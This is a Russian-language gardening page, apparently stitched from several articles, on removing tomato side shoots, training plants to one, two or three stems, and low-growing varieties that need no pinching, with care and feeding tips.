2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Какие томаты требуют пасынкования

Пошаговая инструкция и схема пасынкования томатов в теплице и открытом грунте

Эта нехитрая операция позволяет поднять урожайность овоща, так что необходимо в точности знать, как пасынковать помидоры. Такую процедуру может легко осуществить любой человек, познакомившийся с ее основными принципами.

Сущность проблемы

Пасынкование — это агротехническое мероприятие в овощеводстве, направленное на повышение урожайности. Оно предназначено для оптимального развития куста путем правильного его формирования. Принцип операции заключается в удалении лишних ветвей, которые не плодоносят, но потребляют какое-то количество полезных веществ.

Помидоры относятся к тем огородным культурам, у которых куст при развитии начинает достаточно активно ветвиться. По мере его роста из пазух листьев появляются боковые ветви, которые и считаются бесполезными элементами, отнимающими питательные вещества у плодов. Такие ветви принято называть пасынками, а их удаление — пасынкованием.

Таким образом, решая задачу, как правильно пасынковать помидоры в теплице или на огороде, можно обеспечить правильное формирование растений. На кусте остаются только плодоносящие ветви, что позволяет более полно использовать вносимые удобрения и питательные элементы из почвы. Схема пасынкования может применяться разная, что дает возможность формирования нескольких вариантов кустов.

Так ли важно удалять лишние ветви? Этот вопрос можно услышать от неопытных овощеводов. Оценить необходимость процедуры удастся по таким фактам. Пасынки на помидорах вырастают между стеблем и листом. Их появление заставляет куст активно ветвиться, а новые лишние ветки развиваются вновь и вновь. Особо заметно такое явление на высокорослых сортах (индетерминантные томаты), у которых плодоносящая ветвь образуется лишь в районе 7-11 листа, а из каждого листа может развиться пасынок. Другими словами, на одну полезную ветку может приходиться более 6 бесполезных.

В результате разрастания куста теряется баланс между зеленой и плодовой массой и зелень забирает на себя большую часть питательных веществ. Существенно замедляется вызревание плодов. Таким образом, установлено, что своевременное удаление пасынков ускоряет созревание помидоров в среднем на 12-16 дней. Сами плоды на непасынкованных кустах значительно мельче, да и общее их количество уступает обработанным томатам. Окончательно можно резюмировать — без пасынкования велик риск получения в конце сезона мелких, недозрелых помидоров.

Принципы пасынкования

При проведении пасынкования важно не навредить растению, а для этого данная операция должна проводиться в определенные сроки и по специфическим правилам. Опытные овощеводы дают такие принципиальные рекомендации:

  1. Первое пасынкование томатов в теплице или на огороде следует проводить уже на первой кисти в период цветения.
  2. Обрывать пасынки у помидор надо своевременно, пока они не выросли до 5 см. Удалять веточки можно путем прищипки, обламывания или отрывания, но не обрезания.
  3. Все пасынки, расположенные ниже ветки с завязями цветков, подлежат удалению. Если они располагаются выше цветущей ветви, то их можно оставить в расчете на возможное появление завязей.
  4. При отрывании пасынков следует стараться, чтобы выделяемый сок не попадал на руки, т. к. таким образом можно заразить другие кусты имеющимися у обрабатываемого растения заболеваниями. Само мероприятие лучше проводить в утреннее время.
  5. При проведении пасынкования надо удалить и самые нижние листья, которые касаются поверхности земли. Ствол растения должен быть сухим, освещенным солнцем и хорошо проветриваемым.
  6. Вторичное пасынкование с прищипыванием верхушки обеспечивается в июле-августе для прекращения роста куста ввысь.

Виды пасынкования

Вопрос о том, как формировать помидоры, можно решить тремя способами, в зависимости от того, сколько веток оставляется на кусте. Выделяются такие разновидности пасынкования:

  1. Схема в 1 стебель. При таком способе удалять надо все пасынки, оставляя для плодов всего 1 стебель. Томат растет быстро, и плоды становятся крупнее. Недостаток — большая высота, что требует подвязывания к опоре, в противном случае стебель сломается под тяжестью плодов.
  2. Схема в 2 стебля. В данном варианте, помимо основного стебля, на кусте оставляется 1 пасынок, а остальные удаляются. Для плодоношения выбирается самый крепкий отросток, как правило, расположенный непосредственно под первым соцветием.
  3. Куст в 3 стебля. Такое формирование томатов подразумевает сохранения основного стебля и 2 пасынков. Прищипывание проводится в таком порядке: выбирается наиболее крепкий отросток рядом с нижним соцветием, недалеко от него отыскивается еще одна достаточно крепкая веточка. Все остальные пасынки удаляются.

Пасынкование помидор в теплице чаще всего обеспечивается по первой и второй схемам. Трехветочный куст в парниках формируется редко. Вопрос, как пасынковать помидоры в открытом грунте, может решаться любым из приведенных способов в зависимости от сорта овоща.

По технологии пасынкование томатов в открытом грунте и в тепличных условиях не имеет отличий. Начальная операция проводится при появлении цветочных бутонов, пока отростки не превысили длины 4-5 см. При большем размере обрываемого пасынка возрастает вероятность заболевания растения. Следует помнить, что по мере развития овоща появляются новые ненужные ответвления и их желательно удалять каждую неделю.

Пасынкование в зависимости от сорта

По характеру роста куста все помидоры подразделяются на 2 основных типа:

  1. Индетерминантные сорта. Это достаточно высокие растения, у которых рост верхушки не ограничен. Быстро разрастаются и боковые ответвления. Если такие кусты не формировать по выбранной схеме и не проводить прищипывание верхушки, то они достигают большой высоты и значительно разрастаются во все стороны. Все это происходит в ущерб количеству и качеству плодов.
  2. Детерминантные сорта. Их основное отличие от предыдущей разновидности заключается в ограничении роста основного стебля. На его вершине образуется плодоносящая плеть, которая и останавливает рост растения в высоту. Таким образом, количество завязей после появления верхнего соцветия больше не увеличивается, а потому очень важно правильно выбрать самую плодовитую ветвь.

На вопрос, как обрывать пасынки, можно ответить следующим образом: к разным сортам требуется специфический подход с учетом особенностей их естественного формирования. Индетерминантные помидоры можно пасынковать по любой схеме, но чаще всего применяется схема в 1 стебель. Важно своевременно прищипывать помидоры в теплице (верхушку), не допускания чрезмерного роста в высоту.

При выращивании в парнике и использовании схемы в 1 стебель применяется обычно такая технология. Оставленный стебель по мере роста постепенно опускается к земле и укладывается на ее поверхности. Появляющиеся новые пасынки постоянно удаляются. На основных стеблях оставляется 8-10 кистей. Наиболее распространенные сорта — Мажор, Счастье, Спрут.

Формирование детерминантных томатов вызывает определенные сложности. Для правильного выбора наиболее качественного стебля рекомендуется придерживаться таких принципов:

  • чаще всего используется схема с 2 или 3 стеблями;
  • пасынки обрываются при достижении длины порядка 4 см, когда можно оценить их жизнеспособность;
  • если есть сомнение в правильности выбора, то лучше временно оставить несколько ветвей и удалять ненужные уже после начала цветения;
  • при выращивании в открытом грунте допускается обойтись без пасынкования, т. к. кусты можно расположить на достаточном расстоянии друг от друга;
  • на оставленном стебле сохраняется 6-8 соцветий.

Посадка этих сортов также требует особого подхода. С учетом активного разрастания куста вбок расстояние между растениями обеспечивается порядка 30-35 см. Наиболее распространенные детерминантные сорта — Ажур, Кукла.

В последнее время выведены супердетерминантные сорта, которые требуют особой осторожности в пасынковании. Кроме того, популярность приобрели современные сорта томатов без пасынкования. На таких помидорах обрывание пасынков проводится только 1 раз и до первой кисти. При последующем росте растения процедура уже не осуществляется. Можно отметить такие томаты этого типа — Гаврош, Акварель, Москвич, Витязь, Ракета, Виконте, Ямал, Аляска, Малиновое чудо, Белый налив (241), Вершок.

Осуществление пасынкования

Удаление пасынков обычно обеспечивается руками без использования режущего инструмента. При применении ножей появляется риск переноса инфекции с одного куста на другой и появления раны на месте среза. Однако при большом тепличном хозяйстве обойтись без инструмента не удается. В принципе, срезать пасынки можно, но с соблюдением мер предосторожности.

Перед тем, как пасынковать помидоры в теплице (пошагово) путем срезания, необходимо запомнить следующее:

  1. Производится заточка инструмента до состояния острой бритвы.
  2. Осуществляется дезинфекция режущей части раствором хлорной извести или марганцовки.
  3. Быстрым и точным движением срезается пасынок на расстоянии 10-15 мм от основания, не повреждая основную ветвь.
  4. Срезаются все пасынки на одном кусте, причем удаленные стебли сразу складываются в отдельную емкость и выносятся из парника, что позволяет избежать гниения и распространения инфекции.
  5. Новая дезинфекция инструмента необходима. Данная операция проводится каждый раз при переходе на новый куст.

При обеспечении нужного ухода за помидорами важно четко отличать пасынок от плодоносящего стебля. Выделяются такие важнейшие отличия:

  • на пасынке сразу заметны листки в то время, как на стебле наблюдаются цветочные завязи;
  • пасынок растет из пазухи листьев, а плодоносящая плеть ответвляется только от стебля;
  • наиболее наглядна разница при длине пасынка порядка 4-5 см.

Пасынкование справедливо считается важным агротехническим мероприятием при выращивании помидоров как в теплицах, так и на огороде. Эта простая, но кропотливая работа требует предельной внимательности и осторожности, но зато пасынкованный томат дает обильный урожай и вкусные, полноценные плоды.

Помидоры, которые не надо пасынковать и подвязывать

С наступлением дачного сезона, работы у садоводов становиться немало. Сначала мы занимаемся выращиванием рассады, затем подготовкой места на участке для наших саженцев. С каждым месяцем работы только прибавляется. Настает пора высадки томатов на участки и дальнейший кропотливый уход за ними.

С томатов необходимо удалять пасынки, подвязывать, а это отнимает слишком много времени, и, более того, даже может нанести вред нашим растениям, над выращиванием которых мы так упорно трудились. Ведь удаление пасынков требует определённых знаний и опыта, если в процессе неправильно пасынкования на растение попадет инфекция, то оно погибнет.

К счастью, существуют такие сорта томатов, которые не требуют пасынкования и подвязки.

Кусты таких томатов низкорослые, компактные, неприхотливые и не нуждаются в опоре. При выборе семян, обратите внимание на упаковку, на ней должно быть указано, что сорт данного томата штамбовый, так как только штамбовые сорта не требуют пасынкования, ввиду того, что на растении развивается всего один толстый, мощный стебель, который не дает боковых побегов.

«Карликовые» томаты обычно отличаются хорошей плодоносностью, ранним созреванием плодов. По размерам плоды разнятся в зависимости от сорта, встречаются «малыши» с крупными плодами, средними, мелкими и декоративными.

Низкие сорта томатов в большинстве случаев защищены от фитофторы, редко болеют этой болезнью

Томаты, которые не нужно подвязывать и пасынковать

Сорт «Гном»

Этот сорт низкорослый и холодоустойчивый. Пасынкования и подвязки не требуется. Плоды данного сорта небольшие, всего 45-55 грамм, имеют округлую форму и ярко-красный цвет. Томаты отлично хранятся, транспортируются. Используются в свежем виде, в салатах, в консервировании и мариновании цельными плодами.

Растения предназначены для выращивания в открытом грунте, плоды они начинают приносить примерно через 3,5 месяца, поэтому лучше выращивать томат рассадным способом. Сеять на рассаду можно в конце февраля или начале марта, спустя 3 месяца, растения можно высадить на участок. Особых трудов в обработке сорт не требует, с выращиванием вполне справится даже неопытный садовод.

Сорт «Балконное Чудо»

Растение данного сорта относится к ранним, компактным и декоративным. Плоды у растения круглые, ярко-красного цвета, весом около 20-30 грамм, очень сладкие на вкус. Сорт привит от фитофторы, отлично вырастает в горшках на подоконнике. Высота растения около 30-40 см, куст очень не раскидистый и нарядный. Плоды рекомендуется употреблять в свежем виде и для консервирования.

С того момента, как проявились первые побеги и до получения урожая проходит 90-100 дней. Сорт можно выращивать не только на подоконнике, но и на садовом участке или в теплице. На рассаду сажают семена в 20 -х числах марта. Пересаживают в грунт на расстоянии 20 см друг от друга. Урожай можно собрать около 5 кг с одного кв. метра площади.

Сорт «Пуговка»

«Пуговка»-декоративный сорт раннего созревания. Растение принесет плоды уже через 90-95 дней. Сорт без особых усилий вырастет в горшках и открытом грунте. В высоту растение достигает всего 30-40 см, оно не требует подвязки и пасынкования. Низкорослые кустики обычно плотно усыпаны томатами. Плоды круглые, глянцевые, довольно плотные, весят около 10-15 грамм.

На рассаду томат высаживают в конце марта, в грунт можно будет пересадить растение спустя 45 дней. Схема посадки 50х40 см. Плоды становятся любимым лакомством для детей, имеют очень сладкий вкус и особенный аромат, они нашли применение в кулинарии как украшение праздничных блюд, так и в консервировании.

Сорт «Лорд»

Этот сорт по срокам созревания относится к сортам средней спелости, рекомендуется выращивать рассадным методом. Пригоден для выращивания на открытом участке, он прекрасно чувствует себя в условиях сибирского лета. Растение в высоту едва достигнет 50 см. Куст не требует подвязки и пасынкования, не смотря на то, что имеет достаточно крупные плоды до 200 грамм , что и отличает этот сорт от других низкорослых томатов.

Плоды имеют слегка вытянутую овальную форму, напоминающее яйцо. Томаты в зрелом виде приобретают красный окрас. Плодоносить растение начинает спустя 120-13- дней после посадки. Плоды прекрасно подходят для консервации, вкусны в свежем виде.

Сорт «Буян желтый»

Данный сорт средне-созревающий. Куст томата невысокого роста, примерно 45-50 см. Помидоры этого сорта не нуждается в удалении пасынков и подвязке. Растение предназначено для выращивания в открытом грунте, отлично переносит перепады температур. Ветки томатов густо увешены мелкими, ярко-желтыми плодами. От прорастания семян до появления урожая проходит примерно 120 дней. Помидоры ароматные, вкус немного кислый. Рекомендован для салатов и консервации.

Садоводы, часто выращивающие данные сорта томатов, говорят, что нужно качественно проводить отбор семян для посадки, приобретая их только у проверенных агрофирм. Рассаду лучше выращивать самим, обеззараживая их в специальных растворах. В отличие от других сортов томатов, рассаду низких помидоров лучше растить не на подоконнике, а под пленкой в теплице, это закалит помидоры, стебли будут более толстыми. Остальная работа сводится к обеспечению достаточного полива, подкормки и рыхлению почвы.

Невысокие сорта томатов не доставляют особых хлопот при выращивании, этот фактор для многих садоводов является определяющим при выборе сорта для посадки на своем участке. Стоит отметить, что сорта, которые не требуют подвязки и пасынкования, имеют, в основном, мелкие или не очень крупные плоды. Урожайность таких сортов невысокая, в отличие от томатов высокорослых сортов, имеющих крупные плоды. Мелкие томаты обладают отличным вкусом, они занимают достойное место в кулинарии.

Вы можете вырастить на своем участке разные сорта, отличающиеся способами выращивания, вкусовыми качествами, размерами плодов, ведь каждый подбирает для себя наиболее подходящий сорт, в итоге, останавливается на самых полюбившихся. Тогда и хлопоты по выращиванию томатов превращаются в удовольствие.

Обзор сортов томатов, не требующих пасынкования

Сорта, которые не нуждаются в удалении пасынков, подходят для тех, у кого еще мало опыта в выращивании овощной культуры. Правильное формирование стебля требует определенных знаний. Непасынкующиеся томаты также незаменимы для дачников, которые редко появляются на участке и не могут постоянно контролировать рост боковых побегов.

Преимущества непасынкующихся разновидностей

Чтобы на кусте за сезон сформировалось и успело созреть максимальное количество помидров отличного вкуса, требуется правильное соотношение побегов и плодов. Лишняя листва забирает у растения питательные вещества, необходимые для полноценного развития помидор. Для того чтобы направить силы томатных кустов на созревание урожая огородники удаляют часть побегов. В первую очередь это касается пасынков – отростков, растущих в пазухах основного ствола.

Такая мера способствует образованию того количества завязей, которое может вызреть до наступления холодов. Кроме этого, удаление боковых побегов позволяет сохранить равномерное освещение листвы на протяжении сезона. Сорта томатов, не требующих пасынкования – это, в какой-то мере помидоры для ленивых. Для ухода за ними нужно меньше времени и усилий. Кусты самостоятельно прекращают расти после завязывания нескольких плодовых кистей, у них ограничен рост боковых побегов.

Спрашивайте и получайте полезные советы от профессиональных садоводов и опытных дачников.Задать вопрос >>

Большинство сортов относятся к ранним, низкорослым томатам, предназначенным для открытых грядок. Среди непасынкующихся разновидностей есть гибриды, устойчивые к распространенным болезням семейства пасленовых. На основе отзывов огородников можно выделить хорошо зарекомендовавшие себя сорта.

Крупноплодные сорта

Урожайность – один из важных показателей, который учитывают огородники. Несмотря на то, что не требующие пасынкования разновидности в основном уступают по количеству завязей и размерам плодов своим высокорослым собратьям, селекционеры смогли вывести ряд сортов, позволяющих получить до 8-9 кг помидор с 1 м 2 .

  • Алтаечка. Сорт отдает урожай через 3 месяца, до появления фитофтороза. Высота куста на огородных грядках не превышает 70 см, в тепличных условиях – 90 см. Плоды весят до 300 г, имеют насыщенный алый окрас кожуры и мякоти. При посадке 4 кустов на 1 м 2 и соблюдении агротехники урожайность достигает 8 кг.
  • Штамбовый крупноплодный. Относится к среднеспелым сортам, не требующим опоры. Компактные кустики вырастают чуть выше полуметра высотой. Масса среднего помидора около 350 г. На нижней кисти созревают более крупные экземпляры, весом 500 г. Спелые овощи используют для салатов, приготовления сока. Рекомендуется выращивать на открытых грядках с плотной посадкой (40 см между кустами).
  • Тамара. Сорт для выращивания под пленкой или в открытом грунте. Урожай созревает через 110 дней. Ценится за высокие вкусовые качества спелых помидор, весом около 300 г. С каждого куста собирают до 6 кг плодов, при этом высота растения составляет всего 80 см. Недостаток сорта – подверженность корневой гнили, мучнистой росе и раннему увяданию. Агротехника обязательно должна включать профилактику этих заболеваний.
  • Тасманский шоколад. Созревание наступает через 85 суток. Куст густо покрыт темно-зеленой листвой. Приплюснутые плоды имеют красно-коричневый окрас кожицы и более светлый цвет мякоти. Урожайность составляет 8-9 кг с одного растения при весе плодов 250-350 г. Подходит для теплиц, прекрасно растет в открытом грунте в средней полосе России.

Крупноплодным сортам необходимо обеспечивать подвязку кистей, чтобы ветки не ломались под тяжестью наливающихся помидоров.

Сорта для засолки

К этой категории принадлежат разновидности с небольшими плодами, имеющими плотную кожицу, защищающую от растрескивания при термической обработке. Засолочные непасынкующиеся томаты отличаются дружной отдачей урожая. Средний вес каждого помидора составляет не более 100 г. Это позволяет целиком закладывать плоды в банки.

  • Засолочное чудо. Компактный кустик (70-80 см) не нуждается в удалении пасынков. Мясистые плоды овальной формы созревают на кистях по 10-12 шт. Урожай созревает спустя 3 месяца. Спелые помидоры с плотной кожурой без потерь переносят транспортировку. Засолочное чудо отличается высоким иммунитетом к болезням, устойчив к температурным колебаниям. Ровные, напоминающие сливы плоды, вырастают весом до 100 г.
  • Дамские пальчики. Сорт непасынкующегося томата цилиндрической формы. Быстрое созревание плодов позволяет избежать фитофторы. Кусты высотой 60 см усыпаны помидорчиками, собранными в кисти по 5-6 шт. Мякоть вкусная с малым количеством семян. Выращивается преимущественно в открытом грунте.
  • Барнаульский консервный. Ранний сорт, устойчивый к низким температурам. Созревание наступает через 95-105 дней. Круглые, оранжево-красные томаты коктейльного типа не превышают по весу 50 г. Раскидистый куст требует подвязывания, иначе плоды склоняются к земле. По мнению огородников, сорт идеально подходит для домашних заготовок.
  • Перцовка. Очень урожайный и нетребовательный сорт, плоды которого предназначены для цельноплодной засолки. Выращивается без опоры на открытых грядках в условиях средней полосы, Сибири и Урала. Гладкие, вытянутые помидорчики с миниатюрным носиком созревают через 3-3,5 месяца. Мякоть и кожура окрашены в яркий красный цвет.
  • Разносол. Детерминантный сорт рекомендован для открытого грунта. Даже в неблагоприятных погодных условиях на кусте завязывается большое количество плодов. Нагруженные зреющими помидорами кисти требуют своевременной подвязки. Гладкие, круглые томаты вырастают до 70 г. Спелая мякоть окрашена в красный цвет и обладает приятным вкусом.

Засолочные сорта помидоров без пасынкования, как правило, отличаются лежкостью. Плотная кожица способствует длительному хранению без потери товарного вида.

Гибриды

Урожайные и стойкие гибридные томаты привлекают огородников, выращивающих овощи в регионах с неблагоприятными климатическими условиями. Среди разновидностей, не требующих удаления пасынков, стоит обратить внимание на следующие томаты:

  • Бенито F1. Результат работы голландских селекционеров, который позволил получить томат с высоким иммунитетом к самым распространенным болезням. Кусты низкорослые с поникающими кистями по 7-9 плодов. Большое количество завязей вынуждает огородников создавать дополнительную опору и подвязывать ветви. Созревшие помидоры имеют форму сливки, алый цвет и плотную кожицу. Масса овощей варьируется в пределах 40-70 г.
  • Биатлон F1. Детерминантный гибрид для открытых грядок и выращивания под пленкой. Плоды собраны в кисти по 6-7 шт. Куст самостоятельно останавливает рост на уровне 80-90 см. Гладкие, круглые помидоры красного цвета в большей степени подходят для консервирования. Масса одного плода не превышает 100 г. Гибрид устойчив к вирусу мозаики.
  • Иришка F1. Очень урожайный томат длительного плодоношения. Детерминантные кусты выращивают без пасынкования, хотя некоторые огородники удаляют боковые побеги, растущие ниже 1-й кисти. Созревание начинается через 80-90 дней и продолжается до конца сезона. Спелые помидоры имеют сладкий вкус и весят 40-70 г.

Гибриды несколько уступают по вкусовым качествам сортовым овощам. Кроме того, их семена не имеет смысла собирать для посева на следующий сезон.

Сорта для теплиц

В защищенном грунте выращивают помидоры, которым требуется больше времени на созревание и особый температурный режим. Благодаря компактным размерам, непасынкующиеся сорта томатов для теплиц используют для уплотнения грядок.

  • Витязь. Сорт ценится за иммунитет к болезням и высокие показатели урожайности. Низкие кустики формируют до 7 кг крупных плодов. Средний экземпляр весит около 250 г. Плотная кожица способствует длительному хранению и позволяет помидорам не растрескиваться при консервировании.
  • Красная шапочка. Сорт немецкой селекции для выращивания в областях с умеренным климатом. Куст вырастает до 70 см и не требует формирования стебля. Плоды округлые, у основания имеют слабую ребристость. Цвет спелого помидора алый, вес около 60-70 г. Рекомендован для диетического питания за счет высокого содержания полезных сахаров и ликопина.
  • Петрушка огородник. Сорт отечественной селекции с характерными малиновыми плодами на компактных кустах. Отличается длительным периодом сбора урожая. Не вытягивается, но требует подвязки плодовых кистей. Средний вес помидора на нижних ветках – 200 г, на верхушке куста – 150 г. Для предотвращения растрескивания нуждается в частых поливах.

При выборе помидоров, не требующих удаления пасынков, стоит обратить внимание на группу сортов компании «Седек» с общим названием «Томат Непасынкующийся».

Несколько разновидностей объединены по схожим правилам агротехники и отличаются внешним видом плодов:

  • по окраске (томат непасынкующийся алый, малиновый, полосатый);
  • по форме (цилиндрический, сливовидный, оранжевый с носиком);
  • по назначению (засолочный, консервный и т.д. ).

Все сорта можно выращивать как в открытом грунте, так и в защищенном. Высота кустов составляет от полуметра до метра. Средний вес спелого помидора колеблется от 80 г до 200 г.

Томаты для ленивых, к которым можно отнести все перечисленные сорта и гибриды, позволяют огородникам уделять помидорным грядкам меньше внимания. Непасынкующиеся разновидности – находка для дачников, не имеющих времени на каждодневный уход за грядками.

Формируем кусты правильно: пасынкуют ли низкорослые помидоры и какие сорта не требуют этого этапа

Несмотря на обилие томатов на прилавках магазинов и рынках, многие люди продолжают выращивать помидоры самостоятельно. И это понятно — свои продукты с грядки и вкуснее, и здоровее.

Одни огородники предпочитают открытый грунт, другие — теплицы, третьи — домашние подоконники. И если для выращивания помидоров в квартире есть специальные низкорослые сорта, то на своем участке выбор семенного материала для культивирования невысоких томатов не так очевиден. Кроме того, не все огородники в курсе, обязательно ли удалять у низкорослых кустов пасынки.

Из статьи вы узнаете, нужно ли пасынковать низкорослые сорта для теплиц и открытого грунта, и как делать это правильно.

Что такое пасынкование

Пасынки — это боковые отростки на стебле, которые растут между стволом томата и листом, в пазухах. Пасынкование — удаление этих отростков.

Есть два способа выполнения процедуры:

  1. Руками в резиновых перчатках. Пасынок раскачивают из одной стороны в другую до тех пор, пока не оторвется. Делают это в первой половине дня — в это время стебли более сочные, а также остается время для закрытия ранки.
  2. Острым ножом или ножницами. Режут точными движениями, при переходе к другому отростку обрабатывают инструмент дезинфицирующим раствором (1%-ной хлорной известью, 1%-ным перманганатом калия или слабым раствором марганцовки). Для предотвращения роста новых пасынков на этом месте оставляют 1,5 см отростка. Отрезанные стебли выносят из теплицы во избежание возникновения инфекции.

Удаляют пасынки, прежде чем они достигнут 5 см, иначе это приведет к травмированию томата и снижению урожайности.

Практической пользы от пасынков нет. Удаляя их, вы направляете полезные микроэлементы в цветы и плоды. Если этого не сделать, растение начнет «жировать», снизится качество и количество урожая.

Выделяют 2 вида пасынкования низкорослых томатов:

  1. Пасынкование в два стебля. Оставляют один самый сильный пасынок, остальные удаляют.
  2. Пасынкование в три стебля. Оставляют один стебель и два пасынка. Выбирается самый крепкий отросток от нижних соцветий и еще один рядом с ним.

Необходимо отличать пасынок от стебля:

  • на пасынке растут листочки, на стебле сразу появляются цветочные завязи;
  • пасынок растет из пазух, новый стебель — из основного.

Пасынкование проводят на протяжении всей жизни растения.

Особенности выращивания низкорослых томатов

Низкорослые томаты, или детерминантные, любят за скороспелость, они дают мало пасынков, созревают дружно. Пасынкование низкорослых томатов проходит в 2 или 3 стебля. Это улучшает качество и количество плодов. Чем меньше питательных веществ будет расходоваться на листья, тем больше пойдет в плоды.

При большом количестве пасынков и листьев трудно собирать урожай, не повреждая растения. Получаются настоящие заросли, через которые придется продираться.

Также не стоит забывать и о подвязывании помидоров. При хорошем уходе плоды получаются довольно увесистыми и могут обломить ветку. Это приведет к травмированию растения и, как следствие, ухудшению плодоношения.

Исключение составляют штамбовые томат высотой 40-60 см и толстым стеблем. Такие растения выращивают даже на подоконнике.

Есть множество сортов низкорослых томатов, не требующих пасынкования. Такие растения имеют отличную устойчивость к низким температурам. Если выращивать их без рассады, т. е. сажать сразу в открытый грунт, они будут закаленными, стрессоустойчивыми.

Низкорослые помидоры подходят для начинающих овощеводов или людей, которые в силу своей загруженности не могут уделять много времени формированию растений.

Справка. Низкорослые непасынкующиеся томаты практически не подвержены фитофторозу. Болезнь эта чаще всего поражает растения в конце августа. К тому моменту низкорослые томаты почти перестают плодоносить.

Томаты для открытого грунта, не требующие пасынкования

Учитывайте некоторые особенности высаживания томатов в открытый грунт:

  • в первые дни после посадки укройте рассаду, чтобы предотвратить ожоги листьев;
  • выбирайте участок, максимально защищенный от ветра;
  • сажайте рассаду не позднее конца апреля, семена — середины мая;
  • перед посадкой подержите семена в мокрой марле около 4 часов;
  • выбирайте сорта томатов, подходящие для вашего климата.

Многие овощеводы задают себе вопрос: нужно ли и как пасынковать низкорослые помидоры? Сейчас существует множество сортов томатов для открытого грунта, не нуждающихся в пасынковании:

  1. Агата. Вызревает хорошо в открытом грунте и теплицах. Урожайность — 2 кг с куста.
  2. Аделина. Высота — около 40 см, среднеспелый, плоды цилиндрической формы, урожайность — 3 кг с куста.
  3. Акварель. Высота — 50 см, среднеспелый, плоды вытянутой формы, урожайность — 7 кг на 1 м².
  4. Аляска. Высота — 50 см, скороспелый, урожайность — 2 кг с куста.
  5. Белый налив. Высота — 50 см, скороспелый, урожайность — 2 кг с куста.
  6. Гном. Высота — 40 см, скороспелый, плоды небольшие, урожайность примерно 5 кг на 1 м².
  7. Взрыв. Высота — 60 см, скороспелый, урожайность — 3 кг с куста.
  8. Валютный. Высота — до 80 см, среднеспелый, урожайность — до 6 кг с 1 м².
  9. Дамские пальчики. Высота — около 60 см, скороспелый, плоды небольшие, вытянутые, урожайность около 10 кг на 1 м².
  10. Ракета. Высота — 60 см, среднеспелый, урожайность — до 6 кг с 1 м², плоды вытянутой формы.
  11. Малиновое виконте. Высота — 55 см, раннеспелый, урожайность — до 6 кг с куста.
  12. Золотой поток. Высота — 70 см, раннеспелый, урожайность — до 10 кг с 1 м².

Немало создано сортов и для теплицы:

  1. Алсу. Высота — до 1 м, раннеспелый, урожайность — 8 кг с 1 м².
  2. Данко. Высота — до 1,5 м, среднеспелый, урожайность — 3 кг с куста.
  3. Медовая сливка. Высота — до 1,2 м, скороспелый, урожайность — до 10 кг с 1 м².
  4. Невский. Высота — 50 см, скороспелый, урожайность — 8 кг с 1 м².
  5. Санька. Высота — 60 см, скороспелый, урожайность — до 2,5 кг с куста.
  6. Беталюкс. Высота — 50 см, скороспелый, урожайность до 4 кг с 1 м².
  7. Magus H. Высота — 60 см, скороспелый, урожайность — 3 кг с куста.
  8. Оранжевая принцесса. Высота — до 100 см, среднепоздняя спелость, урожайность — до 40 кг с куста. Цвет плодов ярко-оранжевый.
  9. Ацтек. Высота — до 40 см, раннеспелый, урожайность — до 5 кг с 1 м².
  10. Янтарный. Высота — до 60 см, раннеспелый, урожайность — до 6 кг с 1 м².
  11. Розовый ангел. Высота — до 60 см, раннеспелый, урожайность — до 5 кг с куста.

Все сорта низкорослых томатов, крупноплодные или черри, даже без пасынкования нуждаются в минимальном уходе: поливе, подкормке и подвязывании.

Формирование томатов без пасынкования

Для получения богатого и качественного урожая необходимо знать, как правильно формировать томаты. В это понятие входит обрезка листьев и пасынков. Прищипывать кисти низкорослых томатов нет необходимости, т. к. они сами прекращают свой рост, при этом все минеральные вещества идут на созревание урожая.

Обрезают листья до начала цветения. Начинают уже через 10 дней после высадки рассады. Удаляют листья постепенно — растение при этом испытывает стресс. Лучше всего по 2-3 листа, не чаще 2 раз в неделю. Рвать движением вверх, иначе можно зацепить кожу со ствола и вызвать дополнительный стресс у растения.

Полному удалению подлежат нижние листья: это улучшает воздухообмен. Рекомендуется обрывать их под каждой завязавшейся кистью, сразу, как только на ветке появятся маленькие зеленые помидоры.

К концу лета, когда томаты перестанут плодоносить, удаляют все листья, чтобы силы пошли на созревание плодов.

Удаление листьев также предупреждает появление у томатов болезней, насекомых-вредителей, которые питаются листьями. Как и пасынкование, обрезку листьев лучше делать в первой половине дня.

В каждом климате есть свои нюансы выращивания низкорослых помидоров. Например, в южных регионах России, где много солнца, листья томатов, растущих в открытом грунте, удаляют по мере необходимости. Не забывайте, что они защищают плоды от солнечных ожогов. И, наоборот, на севере, где солнца мало, листья лучше удалять сразу, поскольку они создают тень.

Важно! Удаляйте почерневшие, желтые и пятнистые листья. Они могут быть поражены болезнью или вредителями. В жаркую погоду укрывайте посадки слоем белого спандбонда, чтобы защитить растения от ожогов.

Уход за низкорослыми томатами

Часто поливать томаты не стоит. В засушливую погоду это делают 2-3 раза в неделю. В пасмурную — 1 раз. Конечно, стоит смотреть на состояние почвы и растения. Сохранению влаги способствует мульчирование. Если мульча лежит плотным слоем, то и полоть часто не возникнет необходимости.

Подкармливают томаты 2 л золы, залитой 5 л кипятка. Когда раствор остынет, добавляем воду до 10 л, засыпаем 10 г борной кислоты и 10 мл йода. Настаиваем сутки. После этого разбавляем еще в 10 раз. Такой подкормкой поливаем растение после образования завязей. На один куст — 1 л.

Советы и рекомендации

Чтобы обеспечить наилучший уход за томатами, внимательно читайте рекомендации, написанные на упаковке семян. Покупайте продукцию добросовестных и проверенных производителей.

Поливайте томаты «под корень» — не лейте воду на листья. При жаркой погоде они получат ожог, при пасмурной — увеличится риск фитофтороза.

Лучше всего сделать небольшое углубление недалеко от ствола или организовать капельный полив: так не повредятся корни. В теплицах организуйте регулярное проветривание. Благодаря этому растения будут опыляться, а риск заразиться фитофторой снизится.

Используйте только теплую воду. В противном случае растения заболеют.

Заключение

Неопытным садоводам или тем, кто не хочет терять много времени на уход за растениями, больше всего подойдут низкорослые сорта. Особых хлопот они не требуют и прощают новичкам многие ошибки. Главное – следовать рекомендациям: проводить пасынкование томатов, обрезку листьев, регулярные полив, подкормку и проветривание теплиц. При должном уходе уже в середине лета можно наслаждаться урожаем.

Томаты, не требующие пасынкования

Начинающие дачники при выборе сорта томатов останавливаются на тех, которые не нуждаются в формировании. Выращивание культуры – процесс не простой, осваивают его постепенно. Аналогично поступают огородники, у которых нет возможности часто навещать свои участки.

Особенности томатов, не требующих пасынкования

Главное отличие растений, дающих приличный урожай без прищипки побегов – неприхотливость. Они хорошо плодоносят при минимуме внимания со стороны человека. Полив, подкормка, прополка – этого достаточно.

